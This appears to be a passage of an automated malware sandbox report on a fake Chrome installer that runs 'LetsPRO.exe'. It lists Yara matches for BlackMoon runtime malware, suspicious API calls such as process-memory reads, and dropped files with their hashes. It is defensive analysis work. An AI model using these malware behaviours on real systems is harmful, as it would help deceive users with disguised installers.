                  Source: Yara match File source: 19.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 13.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 31.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 14.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 26.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 26.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 15.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 19.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 17.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 28.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 17.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 15.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 31.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 18.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 27.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 4.2.LetsPRO.exe.1003c7a7.16.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 27.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 28.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 29.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 13.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 4.2.LetsPRO.exe.10020253.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 29.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 18.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000012.00000002.2139779498.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.3274998990.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000F.00000002.2125913800.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000001F.00000002.2207790099.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000001A.00000002.2139832943.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000005.00000002.2127759383.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000D.00000002.2130925911.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000001D.00000002.2130966068.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000013.00000002.2139603630.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000011.00000002.2133672402.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000001C.00000002.2139915999.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000E.00000002.2132609857.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000001B.00000002.2139674546.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 4320, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 4564, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 5440, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 4912, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 5480, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 5520, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 412, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 6408, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 7224, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 7232, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 7268, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 7284, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: LetsPRO.exe PID: 7380, type: MEMORYSTR
                  Source: LetsPRO.exe Process created: 50

                  System Summary

                  Source: 5.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 14.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 5.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 19.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 13.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 31.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 14.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 26.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 26.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 15.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 19.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 17.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 28.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 17.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 15.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 31.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 18.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 27.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 4.2.LetsPRO.exe.1003c7a7.16.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 27.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 28.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 29.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 13.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 4.2.LetsPRO.exe.10020253.17.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 29.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 18.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDBECEA NtdllDefWindowProc_W,30_2_6CDBECEA
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDBE87A NtdllDefWindowProc_W,CreateSolidBrush,CreateSolidBrush,30_2_6CDBE87A
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCA310D NtDeleteKey,30_2_6CCA310D
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCA0203 OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,CloseHandle,30_2_6CCA0203
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CD3E5C8 NtdllDefWindowProc_W,30_2_6CD3E5C8
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDBF2E5 NtdllDefWindowProc_W,CreateSolidBrush,30_2_6CDBF2E5
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CD58759 GetCurrentThreadId,PeekMessageW,CreateTimerQueue,NtdllDefWindowProc_W,30_2_6CD58759
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCA012C NtQueryInformationProcess,GetModuleHandleW,GetProcAddress,30_2_6CCA012C
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CD42272: CreateFileW,DeviceIoControl,CloseHandle,30_2_6CD42272
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCA9CE2 OpenSCManagerW,OpenServiceW,DeleteService,CloseServiceHandle,CloseServiceHandle,30_2_6CCA9CE2
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCA07CF CreateProcessAsUserW,30_2_6CCA07CF
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\5bb04a.msi
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{26E6D275-3FC7-41A2-B8C2-458B639029D2}
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB403.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB404.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB54D.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB59C.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB5FB.tmp
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC11.tmp
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUTBC13.tmp
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler.exe
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdate.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateBroker.exe
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateOnDemand.exe
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateComRegisterShell64.exe
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine_64.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\psuser.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\psuser_64.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler64.exe
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateCore.exe
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_am.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ar.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bg.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bn.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ca.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_cs.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_da.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_de.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_el.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en-GB.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es-419.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_et.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fa.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fi.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fil.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fr.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_gu.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hi.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hr.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hu.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_id.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_is.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_it.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_iw.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ja.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_kn.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ko.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lt.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lv.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ml.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_mr.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ms.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_nl.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_no.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pl.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-BR.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-PT.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ro.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ru.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sk.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sl.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sr.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sv.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sw.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ta.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_te.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_th.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_tr.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_uk.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ur.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_vi.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-CN.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-TW.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateSetup.exeJump to behavior
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Windows\SystemTemp\GUMD96D.tmp
                  Source: C:\Windows\System32\netsh.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepub
                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIB404.tmpJump to behavior
                  Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll CD28DAEDA3C8731030E2077E6ECCBB609E2098919B05FF310BEF8DCE1DCE2D8D
                  Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll 25D1CC5BE93C7A0B58855AD1F4C9DF3CFB9EC87E5DC13DB85B147B1951AC6FA8
                  Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe 8FE2226E8BEC5A45D4B819359192AB92446B54859BF8877573AB7A3C8B4ADA76
                  Source: goopdateres_ca.dll.16.drStatic PE information: Resource name: RT_STRING type: MIPSEB-LE MIPS-II ECOFF executable not stripped - version 0.114
                  Source: goopdateres_fil.dll.16.drStatic PE information: Resource name: RT_STRING type: VAX COFF executable, sections 80, created Wed Mar 25 10:31:05 1970, not stripped, version 108
                  Source: goopdateres_hu.dll.16.drStatic PE information: Resource name: RT_STRING type: MIPSEL MIPS-II ECOFF executable not stripped - version 0.101
                  Source: goopdateres_ms.dll.16.drStatic PE information: Resource name: RT_STRING type: 370 sysV executable not stripped
                  Source: goopdateres_tr.dll.16.drStatic PE information: Resource name: RT_STRING type: 370 XA sysV pure executable not stripped
                  Source: goopdateres_vi.dll.16.drStatic PE information: Resource name: RT_STRING type: iAPX 286 executable small model (COFF) not stripped
                  Source: goopdateres_ca.dll.30.drStatic PE information: Resource name: RT_STRING type: MIPSEB-LE MIPS-II ECOFF executable not stripped - version 0.114
                  Source: goopdateres_fil.dll.30.drStatic PE information: Resource name: RT_STRING type: VAX COFF executable, sections 80, created Wed Mar 25 10:31:05 1970, not stripped, version 108
                  Source: goopdateres_hu.dll.30.drStatic PE information: Resource name: RT_STRING type: MIPSEL MIPS-II ECOFF executable not stripped - version 0.101
                  Source: goopdateres_ms.dll.30.drStatic PE information: Resource name: RT_STRING type: 370 sysV executable not stripped
                  Source: goopdateres_tr.dll.30.drStatic PE information: Resource name: RT_STRING type: 370 XA sysV pure executable not stripped
                  Source: goopdateres_vi.dll.30.drStatic PE information: Resource name: RT_STRING type: iAPX 286 executable small model (COFF) not stripped
                  Source: sutup-Chrome.13.26.x64.msiBinary or memory string: OriginalFilenameaischeduler.dllF vs sutup-Chrome.13.26.x64.msi
                  Source: sutup-Chrome.13.26.x64.msiBinary or memory string: OriginalFilenameShortcutFlags.dllF vs sutup-Chrome.13.26.x64.msi
                  Source: 5.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 14.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 5.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 19.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 13.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 31.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 14.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 26.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 26.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 15.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 19.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 17.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 28.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 17.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 15.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 31.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 18.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 27.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 4.2.LetsPRO.exe.1003c7a7.16.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 27.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 28.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 29.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 13.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 4.2.LetsPRO.exe.10020253.17.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 29.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
